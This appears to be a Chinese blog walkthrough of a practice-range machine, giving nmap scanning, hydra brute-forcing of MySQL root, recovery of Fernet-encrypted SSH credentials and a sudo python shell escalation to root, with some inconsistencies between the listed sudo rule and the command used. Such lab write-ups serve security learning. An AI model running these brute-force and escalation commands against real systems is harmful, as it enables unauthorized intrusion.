攻防靶场——没有Web怎么打

1. 侦查

1.1 收集目标网络信息:IP地址

1.2 主动扫描:扫描IP地址段

1.3 主动扫描:漏洞扫描

2. 初始访问

2.1 有效账户:本地账户

3. 权限提升

3.1 滥用特权控制机制:Sudo或Sudo缓存


1.1 收集目标网络信息:IP地址

设置成NAT模式:

登录之后自动显示出IP为192.168.230.17


1.2 主动扫描:扫描IP地址段

nmap 192.168.230.17 -n -Pn -p- --reason -sV

-n: 不进行DNS解析,直接使用IP地址进行扫描。

-Pn: 假设目标主机是活动的,不进行ping扫描。

-p-: 扫描所有65535个端口。

--reason: 显示每个状态判断的原因(例如,SYN-ACK响应)。

-sV: 进行服务版本检测,尝试确定开放端口上运行的服务及其版本。

发现1337/SSH、3306/MySQL漏洞


1.3 主动扫描:漏洞扫描

用hydra爆破MySQL服务的root用户的弱口令:

hydra -l root -P /home/kali/Desktop/test/dic0.txt 192.168.230.17 mysql

爆破出MySQL的root/prettywoman


2.1 有效账户:本地账户

利用刚才爆出来的MySQL的root/preetywoman来登录MySQL服务

mysql -h 192.168.230.17 -uroot -pprettywoman --skip-ssl

可看出有个data数据库,其他三个是MySQL默认的数据库


查看data数据库的字段内容:

gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=

UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=


根据表名fernet提示,猜测应该是fernet加密,尝试随波逐流解密:

lucy:wJ9`"Lemdv9[FEw-

用户名确认是lucy,密码是wJ9`"Lemdv9[FEw-


根据先前的1337/SSH,尝试ssh连接:

ssh lucy@192.168.230.17 -p 1337

whoami;id;hostname;ip address

现在还是uid=1000(lucy) gid=1000(lucy) groups=1000(lucy),无root权限


3.1 滥用特权控制机制:Sudo或Sudo缓存

sudo -l列出用户的权限或检查特定命令:

发现能在root权限且无密码的情况下运行/usr/bin/python2 /opt/exp.py


python命令能用于提权

sudo python -c 'import os; os.system("/bin/sh")'


import os; os.system("/bin/sh"); os.setuid(0)

成功sudo提权!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值